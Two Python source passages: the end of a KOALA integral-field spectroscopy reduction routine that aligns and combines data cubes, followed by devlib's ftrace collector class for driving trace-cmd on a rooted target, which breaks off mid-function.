step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[7],
sky_rss=sky_rss_list[7],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[7],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 8:
self.rss9 = KOALA_RSS(
rss_list[8],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[8],
apply_throughput=apply_throughput,
skyflat=skyflat_list[8],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[8],
sky_rss=sky_rss_list[8],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[8],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 9:
self.rss10 = KOALA_RSS(
rss_list[9],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[9],
apply_throughput=apply_throughput,
skyflat=skyflat_list[9],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[9],
sky_rss=sky_rss_list[9],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[9],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if (
np.nanmedian(flux_calibration) == 0
and np.nanmedian(flux_calibration_list[0]) == 0
):
print("\n 3. Cubing without considering any flux calibration ...")
fcal = False
else:
print("\n 3. Cubing applying flux calibration provided ...")
fcal = True
if np.nanmedian(flux_calibration) != 0:
for i in range(n_files):
flux_calibration_list[i] = flux_calibration
print(" Using same flux calibration for all object files")
else:
print(" List of flux calibrations provided !")
if offsets[0] != 1000:
print("\n Offsets values for alignment have been given, skipping cubing no-aligned rss...")
do_cubing = False
if do_cubing:
self.cube1 = Interpolated_cube(
self.rss1,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[0],
warnings=warnings,
)
if len(rss_list) > 1:
self.cube2 = Interpolated_cube(
self.rss2,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[1],
warnings=warnings,
)
if len(rss_list) > 2:
self.cube3 = Interpolated_cube(
self.rss3,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[2],
warnings=warnings,
)
if len(rss_list) > 3:
self.cube4 = Interpolated_cube(
self.rss4,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[3],
warnings=warnings,
)
if len(rss_list) > 4:
self.cube5 = Interpolated_cube(
self.rss5,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[4],
warnings=warnings,
)
if len(rss_list) > 5:
self.cube6 = Interpolated_cube(
self.rss6,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[5],
warnings=warnings,
)
if len(rss_list) > 6:
self.cube7 = Interpolated_cube(
self.rss7,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[6],
warnings=warnings,
)
if len(rss_list) > 7:
self.cube8 = Interpolated_cube(
self.rss8,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[7],
warnings=warnings,
)
if len(rss_list) > 8:
self.cube9 = Interpolated_cube(
self.rss9,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[8],
warnings=warnings,
)
if len(rss_list) > 9:
self.cube10 = Interpolated_cube(
self.rss10,
pixel_size_arcsec,
kernel_size_arcsec,
plot=plot,
flux_calibration=flux_calibration_list[9],
warnings=warnings,
)
if do_alignment:
if offsets[0] == 1000:
print("\n 4. Aligning individual cubes ...")
else:
print("\n 4. Checking given offsets data and perform cubing ...")
rss_list_to_align = [self.rss1, self.rss2]
if len(rss_list) > 2:
rss_list_to_align.append(self.rss3)
if len(rss_list) > 3:
rss_list_to_align.append(self.rss4)
if len(rss_list) > 4:
rss_list_to_align.append(self.rss5)
if len(rss_list) > 5:
rss_list_to_align.append(self.rss6)
if len(rss_list) > 6:
rss_list_to_align.append(self.rss7)
if len(rss_list) > 7:
rss_list_to_align.append(self.rss8)
if len(rss_list) > 8:
rss_list_to_align.append(self.rss9)
if len(rss_list) > 9:
rss_list_to_align.append(self.rss10)
if offsets[0] != 1000:
cube_list = []
else:
cube_list = [self.cube1, self.cube2]
if len(rss_list) > 2:
cube_list.append(self.cube3)
if len(rss_list) > 3:
cube_list.append(self.cube4)
if len(rss_list) > 4:
cube_list.append(self.cube5)
if len(rss_list) > 5:
cube_list.append(self.cube6)
if len(rss_list) > 6:
cube_list.append(self.cube7)
if len(rss_list) > 7:
cube_list.append(self.cube8)
if len(rss_list) > 8:
cube_list.append(self.cube9)
if len(rss_list) > 9:
cube_list.append(self.cube10)
cube_aligned_list = align_n_cubes(
rss_list_to_align,
cube_list=cube_list,
flux_calibration_list=flux_calibration_list,
pixel_size_arcsec=pixel_size_arcsec,
kernel_size_arcsec=kernel_size_arcsec,
plot=plot,
offsets=offsets,
ADR=ADR,
warnings=warnings,
)
self.cube1_aligned = cube_aligned_list[0]
self.cube2_aligned = cube_aligned_list[1]
if len(rss_list) > 2:
self.cube3_aligned = cube_aligned_list[2]
if len(rss_list) > 3:
self.cube4_aligned = cube_aligned_list[3]
if len(rss_list) > 4:
self.cube5_aligned = cube_aligned_list[4]
if len(rss_list) > 5:
self.cube6_aligned = cube_aligned_list[5]
if len(rss_list) > 6:
self.cube7_aligned = cube_aligned_list[6]
if len(rss_list) > 7:
self.cube8_aligned = cube_aligned_list[7]
if len(rss_list) > 8:
self.cube9_aligned = cube_aligned_list[8]
if len(rss_list) > 9:
self.cube10_aligned = cube_aligned_list[9]
if make_combined_cube:
print("\n 5. Making combined cube ...")
print("\n> Checking individual cubes: ")
print(" Cube RA_centre DEC_centre Pix Size Kernel Size")
print(" 1 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube1_aligned.RA_centre_deg,
self.cube1_aligned.DEC_centre_deg,
self.cube1_aligned.pixel_size_arcsec,
self.cube1_aligned.kernel_size_arcsec,
))
print(" 2 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube2_aligned.RA_centre_deg,
self.cube2_aligned.DEC_centre_deg,
self.cube2_aligned.pixel_size_arcsec,
self.cube2_aligned.kernel_size_arcsec,
))
if len(rss_list) > 2:
print(" 3 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube3_aligned.RA_centre_deg,
self.cube3_aligned.DEC_centre_deg,
self.cube3_aligned.pixel_size_arcsec,
self.cube3_aligned.kernel_size_arcsec,
))
if len(rss_list) > 3:
print(" 4 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube4_aligned.RA_centre_deg,
self.cube4_aligned.DEC_centre_deg,
self.cube4_aligned.pixel_size_arcsec,
self.cube4_aligned.kernel_size_arcsec,
))
if len(rss_list) > 4:
print(" 5 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube5_aligned.RA_centre_deg,
self.cube5_aligned.DEC_centre_deg,
self.cube5_aligned.pixel_size_arcsec,
self.cube5_aligned.kernel_size_arcsec,
))
if len(rss_list) > 5:
print(" 6 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube6_aligned.RA_centre_deg,
self.cube6_aligned.DEC_centre_deg,
self.cube6_aligned.pixel_size_arcsec,
self.cube6_aligned.kernel_size_arcsec,
))
if len(rss_list) > 6:
print(" 7 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube7_aligned.RA_centre_deg,
self.cube7_aligned.DEC_centre_deg,
self.cube7_aligned.pixel_size_arcsec,
self.cube7_aligned.kernel_size_arcsec,
))
if len(rss_list) > 7:
print(" 8 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube8_aligned.RA_centre_deg,
self.cube8_aligned.DEC_centre_deg,
self.cube8_aligned.pixel_size_arcsec,
self.cube8_aligned.kernel_size_arcsec,
))
if len(rss_list) > 8:
print(" 9 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube9_aligned.RA_centre_deg,
self.cube9_aligned.DEC_centre_deg,
self.cube9_aligned.pixel_size_arcsec,
self.cube9_aligned.kernel_size_arcsec,
))
if len(rss_list) > 9:
print(" 10 {:18.12f} {:18.12f} {:4.1f} {:5.2f}".format(
self.cube10_aligned.RA_centre_deg,
self.cube10_aligned.DEC_centre_deg,
self.cube10_aligned.pixel_size_arcsec,
self.cube10_aligned.kernel_size_arcsec,
))
#### THIS SHOULD BE A DEF within Interpolated_cube...
# Create a cube with zero
shape = [
self.cube1_aligned.data.shape[1],
self.cube1_aligned.data.shape[2],
]
self.combined_cube = Interpolated_cube(
self.rss1,
self.cube1_aligned.pixel_size_arcsec,
self.cube1_aligned.kernel_size_arcsec,
zeros=True,
shape=shape,
offsets_files=self.cube1_aligned.offsets_files,
)
if obj_name != "":
self.combined_cube.object = obj_name
if description == "":
self.combined_cube.description = (
self.combined_cube.object + " - COMBINED CUBE"
)
else:
self.combined_cube.description = description
print("\n> Combining cubes...")
if len(rss_list) == 2:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[self.cube1_aligned.data_ADR, self.cube2_aligned.data_ADR],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[self.cube1_aligned.data, self.cube2_aligned.data], axis=0
)
self.combined_cube.PA = np.mean(
[self.cube1_aligned.PA, self.cube2_aligned.PA]
)
if len(rss_list) == 3:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
]
)
if len(rss_list) == 4:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
]
)
if len(rss_list) == 5:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
]
)
if len(rss_list) == 6:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
]
)
if len(rss_list) == 7:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
]
)
if len(rss_list) == 8:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
]
)
if len(rss_list) == 9:
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
self.cube9_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
self.cube9_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
self.cube9_aligned.PA,
]
)
if len(rss_list) == 10:
print (ADR)
if ADR:
print(" Using data corrected for ADR to get combined cube...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data_ADR,
self.cube2_aligned.data_ADR,
self.cube3_aligned.data_ADR,
self.cube4_aligned.data_ADR,
self.cube5_aligned.data_ADR,
self.cube6_aligned.data_ADR,
self.cube7_aligned.data_ADR,
self.cube8_aligned.data_ADR,
self.cube9_aligned.data_ADR,
self.cube10_aligned.data_ADR,
],
axis=0,
)
else:
print(" No ADR correction considered...")
self.combined_cube.data = np.nanmedian(
[
self.cube1_aligned.data,
self.cube2_aligned.data,
self.cube3_aligned.data,
self.cube4_aligned.data,
self.cube5_aligned.data,
self.cube6_aligned.data,
self.cube7_aligned.data,
self.cube8_aligned.data,
self.cube9_aligned.data,
self.cube10_aligned.data,
],
axis=0,
)
self.combined_cube.PA = np.mean(
[
self.cube1_aligned.PA,
self.cube2_aligned.PA,
self.cube3_aligned.PA,
self.cube4_aligned.PA,
self.cube5_aligned.PA,
self.cube6_aligned.PA,
self.cube7_aligned.PA,
self.cube8_aligned.PA,
self.cube9_aligned.PA,
self.cube10_aligned.PA,
]
)
# Include flux calibration, assuming it is the same to all cubes (need to be updated to combine data taken in different nights)
# if fcal:
if np.nanmedian(self.cube1_aligned.flux_calibration) == 0:
print(" Flux calibration not considered")
fcal = False
else:
self.combined_cube.flux_calibration = flux_calibration
print(" Flux calibration included!")
fcal = True
# # Check this when using files taken on different nights --> Data in self.combined_cube
# self.wavelength=self.rss1.wavelength
# self.valid_wave_min=self.rss1.valid_wave_min
# self.valid_wave_max=self.rss1.valid_wave_max
self.combined_cube.trace_peak(plot=plot)
self.combined_cube.get_integrated_map_and_plot(fcal=fcal, plot=plot)
self.combined_cube.total_exptime = self.rss1.exptime + self.rss2.exptime
if len(rss_list) > 2:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss3.exptime
)
if len(rss_list) > 3:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss4.exptime
)
if len(rss_list) > 4:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss5.exptime
)
if len(rss_list) > 5:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss6.exptime
)
if len(rss_list) > 6:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss7.exptime
)
if len(rss_list) > 7:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss8.exptime
)
if len(rss_list) > 8:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss9.exptime
)
if len(rss_list) > 9:
self.combined_cube.total_exptime = (
self.combined_cube.total_exptime + self.rss10.exptime
)
print("\n Total exposition time = {} seconds adding the {} files".format(
self.combined_cube.total_exptime, len(rss_list)))
# Save it to a fits file
if save_aligned_cubes:
print("\n Saving aligned cubes to fits files ...")
for i in range(n_files):
if i < 9:
replace_text = "_{}_aligned_cube_0{}{}.fits".format(obj_name, i + 1, pk)
else:
replace_text = "_aligned_cube_{}{}.fits".format(i + 1, pk)
aligned_cube_name = rss_list[i].replace(".fits", replace_text)
if i == 0:
save_fits_file(self.cube1_aligned, aligned_cube_name, ADR=ADR)
if i == 1:
save_fits_file(self.cube2_aligned, aligned_cube_name, ADR=ADR)
if i == 2:
save_fits_file(self.cube3_aligned, aligned_cube_name, ADR=ADR)
if i == 3:
save_fits_file(self.cube4_aligned, aligned_cube_name, ADR=ADR)
if i == 4:
save_fits_file(self.cube5_aligned, aligned_cube_name, ADR=ADR)
if i == 5:
save_fits_file(self.cube6_aligned, aligned_cube_name, ADR=ADR)
if i == 6:
save_fits_file(self.cube7_aligned, aligned_cube_name, ADR=ADR)
if i == 7:
save_fits_file(self.cube8_aligned, aligned_cube_name, ADR=ADR)
if i == 8:
save_fits_file(self.cube9_aligned, aligned_cube_name, ADR=ADR)
if i == 9:
save_fits_file(self.cube10_aligned, aligned_cube_name, ADR=ADR)
if fits_file == "":
print("\n As requested, the combined cube will not be saved to a fits file")
else:
print("\n 6. Saving combined cube to a fits file ...")
check_if_path = fits_file.replace("path:", "")
if len(fits_file) != len(check_if_path):
fits_file = ("{}{}_{}{}_combining_{}_cubes.fits".format(
check_if_path, obj_name, self.combined_cube.grating, pk, n_files)
)
save_fits_file(self.combined_cube, fits_file, ADR=ADR)
print("\n================== REDUCING KOALA DATA COMPLETED ====================\n\n")
|
<filename>devlib/trace/ftrace.py
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import division
import os
import time
import subprocess
from devlib.trace import TraceCollector
from devlib.host import PACKAGE_BIN_DIRECTORY
from devlib.exception import TargetError, HostError
from devlib.utils.misc import check_output, which
# Marker strings written to trace_marker so analysis tools can delimit
# the instrumented region of the trace.
TRACE_MARKER_START = 'TRACE_MARKER_START'
TRACE_MARKER_STOP = 'TRACE_MARKER_STOP'
# Name of the binary trace file produced by "trace-cmd extract" on the target.
OUTPUT_TRACE_FILE = 'trace.dat'
# Events enabled when the caller does not supply an explicit list.
DEFAULT_EVENTS = [
    'cpu_frequency',
    'cpu_idle',
    'sched_migrate_task',
    'sched_process_exec',
    'sched_process_fork',
    'sched_stat_iowait',
    'sched_switch',
    'sched_wakeup',
    'sched_wakeup_new',
]
# Timeout (seconds) for potentially slow trace-cmd operations on the target.
TIMEOUT = 180
class FtraceCollector(TraceCollector):
    """Collect kernel ftrace events from a rooted target using ``trace-cmd``.

    ``trace-cmd`` is driven on the target to start/stop/extract the trace;
    the binary ``trace.dat`` is then pulled to the host, where it can
    optionally be rendered as a text report (host-side ``trace-cmd report``)
    and opened in ``kernelshark``.
    """

    def __init__(self, target,
                 events=None,
                 buffer_size=None,
                 buffer_size_step=1000,
                 buffer_size_file='/sys/kernel/debug/tracing/buffer_size_kb',
                 marker_file='/sys/kernel/debug/tracing/trace_marker',
                 automark=True,
                 autoreport=True,
                 autoview=False,
                 no_install=False,
                 ):
        """
        :param target: devlib target to trace; must be rooted.
        :param events: ftrace events to enable (defaults to DEFAULT_EVENTS).
        :param buffer_size: desired trace buffer size in KB, set best-effort.
        :param buffer_size_step: step used when probing acceptable sizes.
        :param buffer_size_file: tracefs node controlling the buffer size.
        :param marker_file: tracefs node used for start/stop markers.
        :param automark: write TRACE_MARKER_START/STOP around the collection.
        :param autoreport: generate a host-side text report after pulling.
        :param autoview: open the pulled trace in kernelshark.
        :param no_install: use a trace-cmd already present on the target
            instead of installing the packaged binary.
        :raises TargetError: if the target is unrooted, or trace-cmd is
            missing on the target with no_install=True.
        :raises HostError: if a host binary required by autoreport/autoview
            is not installed.
        """
        super(FtraceCollector, self).__init__(target)
        self.events = events if events is not None else DEFAULT_EVENTS
        self.buffer_size = buffer_size
        self.buffer_size_step = buffer_size_step
        self.buffer_size_file = buffer_size_file
        self.marker_file = marker_file
        self.automark = automark
        self.autoreport = autoreport
        self.autoview = autoview
        self.target_output_file = os.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
        self.target_binary = None
        self.host_binary = None
        self.start_time = None
        self.stop_time = None
        self.event_string = _build_trace_events(self.events)
        self._reset_needed = True

        # Host-side tools are only hard requirements when the corresponding
        # auto* feature is enabled, so a missing binary is checked lazily.
        self.host_binary = which('trace-cmd')
        self.kernelshark = which('kernelshark')

        if not self.target.is_rooted:
            raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
        if self.autoreport and self.host_binary is None:
            raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
        if self.autoview and self.kernelshark is None:
            raise HostError('kernelshark binary must be installed on the host if autoview=True.')
        if not no_install:
            host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
            self.target_binary = self.target.install(host_file)
        else:
            if not self.target.is_installed('trace-cmd'):
                raise TargetError('No trace-cmd found on device and no_install=True is specified.')
            self.target_binary = 'trace-cmd'

    def reset(self):
        """Reset target-side tracing state, applying the buffer size if set."""
        if self.buffer_size:
            self._set_buffer_size()
        self.target.execute('{} reset'.format(self.target_binary), as_root=True, timeout=TIMEOUT)
        self._reset_needed = False

    def start(self):
        """Begin collection, resetting first if needed and marking the start."""
        self.start_time = time.time()
        if self._reset_needed:
            self.reset()
        if self.automark:
            self.mark_start()
        self.target.execute('{} start {}'.format(self.target_binary, self.event_string), as_root=True)

    def stop(self):
        """Stop collection and flag that a reset is needed before restarting."""
        self.stop_time = time.time()
        if self.automark:
            self.mark_stop()
        self.target.execute('{} stop'.format(self.target_binary), timeout=TIMEOUT, as_root=True)
        self._reset_needed = True

    def get_trace(self, outfile):
        """Extract the trace on the target and pull it to *outfile* on the host.

        If *outfile* is a directory, the trace is written inside it under the
        target-side file name (trace.dat).
        """
        if os.path.isdir(outfile):
            # FIX: use basename, not dirname. os.path.dirname() yielded the
            # remote *directory* path, so the joined destination never named
            # the trace.dat file inside the requested output directory.
            outfile = os.path.join(outfile, os.path.basename(self.target_output_file))
        self.target.execute('{} extract -o {}'.format(self.target_binary, self.target_output_file),
                            timeout=TIMEOUT, as_root=True)

        # The size of trace.dat will depend on how long trace-cmd was running.
        # Therefore timeout for the pull command must also be adjusted
        # accordingly.
        pull_timeout = self.stop_time - self.start_time
        self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)

        if not os.path.isfile(outfile):
            self.logger.warning('Binary trace not pulled from device.')
        else:
            if self.autoreport:
                textfile = os.path.splitext(outfile)[0] + '.txt'
                self.report(outfile, textfile)
            if self.autoview:
                self.view(outfile)

    def report(self, binfile, destfile):
        """Convert *binfile* to text with host-side trace-cmd into *destfile*."""
        # To get the output of trace.dat, trace-cmd must be installed.
        # This is done host-side because the generated file is very large.
        try:
            command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
            self.logger.debug(command)
            process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
            _, error = process.communicate()
            if process.returncode:
                # NOTE(review): this is a host-side failure, so HostError may be
                # more appropriate; TargetError kept for backward compatibility.
                raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
            if error:
                # logged at debug level, as trace-cmd always outputs some
                # errors that seem benign.
                self.logger.debug(error)
            if os.path.isfile(destfile):
                self.logger.debug('Verifying traces.')
                with open(destfile) as fh:
                    for line in fh:
                        if 'EVENTS DROPPED' in line:
                            self.logger.warning('Dropped events detected.')
                            break
                    else:
                        self.logger.debug('Trace verified.')
            else:
                self.logger.warning('Could not generate trace.txt.')
        except OSError:
            raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')

    def view(self, binfile):
        """Open *binfile* in kernelshark (blocks until kernelshark exits)."""
        check_output('{} {}'.format(self.kernelshark, binfile), shell=True)

    def teardown(self):
        """Remove the trace file from the target's working directory."""
        self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))

    def mark_start(self):
        """Write the start marker into the trace stream."""
        self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)

    def mark_stop(self):
        """Write the stop marker into the trace stream."""
        self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)

    def _set_buffer_size(self):
        """Best-effort buffer sizing: probe downwards from the requested size
        until the kernel accepts a value, then step back up towards the
        target, warning if the final size differs from what was requested."""
        target_buffer_size = self.buffer_size
        attempt_buffer_size = target_buffer_size
        buffer_size = 0
        floor = 1000 if target_buffer_size > 1000 else target_buffer_size
        while attempt_buffer_size >= floor:
            self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
            buffer_size = self.target.read_int(self.buffer_size_file)
            if buffer_size == attempt_buffer_size:
                break
            else:
                attempt_buffer_size -= self.buffer_size_step
        if buffer_size == target_buffer_size:
            return
        while attempt_buffer_size < target_buffer_size:
            attempt_buffer_size += self.buffer_size_step
